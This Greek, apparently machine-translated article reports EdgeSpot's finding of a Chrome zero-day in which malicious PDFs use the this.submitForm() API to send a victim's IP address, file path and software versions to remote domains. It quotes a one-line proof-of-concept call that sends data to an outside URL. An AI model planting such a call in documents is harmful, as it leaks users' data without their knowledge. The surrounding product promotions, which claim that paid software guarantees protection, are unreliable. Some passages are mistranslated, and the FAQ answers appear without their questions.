- Το EdgeSpot ανακάλυψε μια ενδιαφέρουσα ευπάθεια μηδενικής ημέρας που εκμεταλλεύεται έγγραφα PDF στο Chrome.
- Αυτό τρωτό μπορεί να σας βλάψει συλλέγοντας τα ευαίσθητα δεδομένα στον υπολογιστή σας.
- Εξερευνήστε μας Σελίδα Web & Cloud για περισσότερες πληροφορίες σχετικά με άλλα εργαλεία και υπηρεσίες.
- Εάν ενδιαφέρεστε για προγράμματα περιήγησης, παρέχουμε πολλές πληροφορίες σχετικά με αυτά στο δικό μας Κέντρο περιήγησης.
Κάντε όλα τα έγγραφά σας προσβάσιμα και ασφαλή χρησιμοποιώντας το Adobe Acrobat Reader. Αυτό το εργαλείο διαχείρισης εγγράφων θα σας επιτρέψει επίσης να κάνετε ηλεκτρονική υπογραφή και να δημιουργήσετε επίσημες φόρμες για να εξοικονομήσετε χρόνο στην εργασία σας. Αποκτήστε το για τον υπολογιστή σας και θα μπορείτε:
- Ανοίξτε, εκτυπώστε και επεξεργαστείτε όλα τα αρχεία PDF και άλλους τύπους αρχείων
- Συμπληρώστε τις φόρμες PDF ευκολότερα
- Κρατήστε τα απαραίτητα έγγραφα κρυπτογραφημένα
Αποκτήστε όλες τις εφαρμογές σε ειδική τιμή!
Το λογισμικό διαχείρισης εγγράφων Nr.1 στον κόσμο είναι τώρα σε εξαιρετική τιμή, οπότε βιάσου!
Η υπηρεσία ανίχνευσης εκμετάλλευσης EdgeSpot ανακάλυψε μια ενδιαφέρουσα Χρώμιο ευπάθεια μηδενικής ημέρας που εκμεταλλεύεται έγγραφα PDF.
Η ευπάθεια επιτρέπει στους επιτιθέμενους συγκομιδή ευαίσθητων δεδομένων χρησιμοποιώντας κακόβουλα έγγραφα PDF που έχουν ανοίξει στο Chrome.
Μόλις το θύμα ανοίξει τα αντίστοιχα αρχεία PDF στο Google Chrome, ένα κακόβουλο πρόγραμμα αρχίζει να λειτουργεί στο παρασκήνιο συλλέγοντας δεδομένα χρήστη.
Τα δεδομένα στη συνέχεια προωθούνται στον απομακρυσμένο διακομιστή που ελέγχεται από τους εισβολείς. Ίσως αναρωτιέστε ποια δεδομένα απορροφούνται από τους εισβολείς, στοχεύουν τα ακόλουθα δεδομένα στον υπολογιστή σας:
- διεύθυνση IP
- Πλήρης διαδρομή του αρχείου PDF στο σύστημα
- Εκδόσεις OS και Chrome
Προσοχή σε αρχεία PDF με κακόβουλο λογισμικό
Εμπειρογνώμονες έχων στίγματα ότι ένας από τους δύο τομείς readnotify [.] com ή burpcollaborator [.] καθαρό έλαβε τα δεδομένα.
Αποκάλυψαν ότι οι επιτιθέμενοι χρησιμοποιούν το this.submitForm () PDF Javascript API για τη συλλογή των ευαίσθητων πληροφοριών των χρηστών.
Το δοκιμάσαμε με ένα ελάχιστο PoC, μια απλή κλήση API όπως this.submitForm (" http://google.com/test’) θα κάνει το Google Chrome να στείλει τα προσωπικά δεδομένα στο google.com.
Αυτό το σφάλμα Chrome εκμεταλλεύτηκε δύο διαφορετικά σύνολα κακόβουλων αρχείων PDF, τα οποία κυκλοφόρησαν και τα δύο τον Οκτώβριο του 2017 και τον Σεπτέμβριο του 2018, αντίστοιχα.
Συγκεκριμένα, τα δεδομένα που συλλέγονται μπορούν να χρησιμοποιηθούν από τους εισβολείς για να βελτιώσουν τις επιθέσεις στο μέλλον. Οι αναφορές δείχνουν ότι η πρώτη δέσμη αρχείων συντάχθηκε χρησιμοποιώντας την υπηρεσία παρακολούθησης PDF του ReadNotify.
Οι χρήστες μπορούν να χρησιμοποιήσουν την υπηρεσία για να παρακολουθούν τις απόψεις των χρηστών. Το EdgeSpot δεν έχει κοινοποιήσει λεπτομέρειες σχετικά με τη φύση του δεύτερου συνόλου αρχείων PDF.
Γρήγορη συμβουλή: Αλλάξτε το πρόγραμμα περιήγησής σας σε Opera
Σε αυτούς τους ταραγμένους καιρούς, μας επιτίθενται με κακόβουλο λογισμικό, ηλεκτρονικό ψάρεμα και trojans σε κάθε βήμα, οπότε πρέπει να είμαστε πολύ πιο προσεκτικοί και να παραμένουμε προστατευμένοι.
Και δεδομένου ότι αυτό είναι ένα συγκεκριμένο πρόβλημα για το Chrome, μπορείτε να αποφύγετε αυτήν την απειλή και όλους τους άλλους με ένα πρόγραμμα περιήγησης με ασφάλεια ΛΥΡΙΚΗ ΣΚΗΝΗ.
Αυτό το πρόγραμμα περιήγησης διαθέτει ένα ενσωματωμένο πρόγραμμα αποκλεισμού διαφημίσεων που όχι μόνο καθαρίζει τέτοιες περισπασμούς αλλά και αποκλείει σενάρια ανάλυσης, εικονοστοιχεία παρακολούθησης και μέθοδοι για τη συλλογή των δεδομένων σας.
Και αν θέλετε να είστε απολύτως σίγουροι ότι αποφεύγετε κάθε κίνδυνο, παραμείνετε πίσω από το ενσωματωμένο VPN υπηρεσία που είναι 100% δωρεάν για απεριόριστο χρόνο.
ΛΥΡΙΚΗ ΣΚΗΝΗ
Το Opera προσφέρει την τέλεια προστασία από απειλές με το ενσωματωμένο πρόγραμμα αποκλεισμού διαφημίσεων και VPN δωρεάν!
Επισκέψου την ιστοσελίδα
Πώς μπορώ να παραμείνω προστατευμένος από ευπάθειες PDF;
Λήψη του Adobe Acrobat PRO
Το Adobe και το Chrome ταιριάζουν με τον χειρισμό αρχείων PDF. Εγκαθιστώντας την επέκταση Adobe για το Chrome, μπορείτε να ελέγξετε και να χειριστείτε τα PDF σύμφωνα με τις προτιμήσεις σας χωρίς να αφήσετε το αγαπημένο σας πρόγραμμα περιήγησης.
Παρά την ισχυρή δομή του, κακόβουλο λογισμικό που κρύβεται σε αρχεία PDF ενδέχεται να μην εντοπιστεί εάν χρησιμοποιείτε την τυπική έκδοση του Αναγνώστη.
Η επαγγελματική έκδοση συνιστάται για να εγγυηθεί την προστασία σας και να κρατήσετε τα δεδομένα σας μακριά από χάκερ.
Αν και δεν είναι δωρεάν, η τιμή που θα πληρώσετε είναι μάλλον μικρή για την πληθώρα πρόσθετων δυνατοτήτων που θα απολαύσετε, συμπεριλαμβανομένης της βελτιωμένης ασφάλειας των αρχείων PDF.
Περιλαμβάνεται επίσης μια δωρεάν δοκιμή 7 ημερών, ώστε να μπορείτε να δοκιμάσετε την πλήρη εμπειρία Pro πριν κάνετε την αγορά.
Adobe Acrobat PRO
Αποφύγετε το κακόβουλο λογισμικό κατεβάζοντας το Adobe Acrobat PRO. Έχει πολλά περισσότερα χαρακτηριστικά από τη δωρεάν έκδοση και διατηρεί τα δεδομένα σας ασφαλή.
Επισκέψου την ιστοσελίδα
Σε περίπτωση που θέλετε να είστε ασφαλείς κατά την περιήγηση στο Διαδίκτυο, θα χρειαστεί να αποκτήσετε ένα πλήρες ειδικό εργαλείο για να ασφαλίσετε το δίκτυό σας. Εγκαταστήστε τώρα την Ιδιωτική πρόσβαση στο Διαδίκτυο και ασφαλίστε τον εαυτό σας. Προστατεύει τον υπολογιστή σας από επιθέσεις κατά την περιήγηση, αποκρύπτει τη διεύθυνση IP σας και αποκλείει κάθε ανεπιθύμητη πρόσβαση.
Η υπηρεσία ανίχνευσης Exploit EdgeSpot ήθελε να ειδοποιήσει τους χρήστες του Chrome για τους πιθανούς κινδύνους, επειδή η ενημέρωση κώδικα δεν αναμενόταν να κυκλοφορήσει στο εγγύς μέλλον.
Η EdgeSpot ανέφερε στην Google σχετικά με την ευπάθεια πέρυσι και η εταιρεία υποσχέθηκε να κυκλοφορήσει μια ενημέρωση στα τέλη Απριλίου.
Ωστόσο, μπορείτε να εξετάσετε το ενδεχόμενο να χρησιμοποιήσετε μια προσωρινή λύση του προβλήματος προβάλλοντας τοπικά τα ληφθέντα έγγραφα PDF χρησιμοποιώντας μια άλλη εφαρμογή ανάγνωσης.
Εναλλακτικά, μπορείτε επίσης να ανοίξετε τα έγγραφα PDF στο Chrome αποσυνδέοντας τα συστήματά σας από το Διαδίκτυο.
Συχνές Ερωτήσεις
Ναι είναι. Αλλά αν θέλετε μια ευρύτερη επιλογή, εξερευνήστε τις κορυφαίες επιλογές μας Χρώμιομυστικότητα επεκτάσεις σε αυτόν τον πλήρη οδηγό.
ΤΕδώ είναι πολλές επεκτάσεις που επιτρέπουν PDF επεξεργασία. Ελεγχος έξω μας εξαιρετικός οδηγός σχετικά με τις καλύτερες επεκτάσεις PDF για το Chrome.
Δεν είναι, αλλά μπορείτε να το ενεργοποιήσετε γρήγορα. Εδώ είναι το δικό μας ολοκληρωμένος οδηγός σχετικά με τον τρόπο ενεργοποίησης της δημιουργίας κώδικα QR στο Chrome.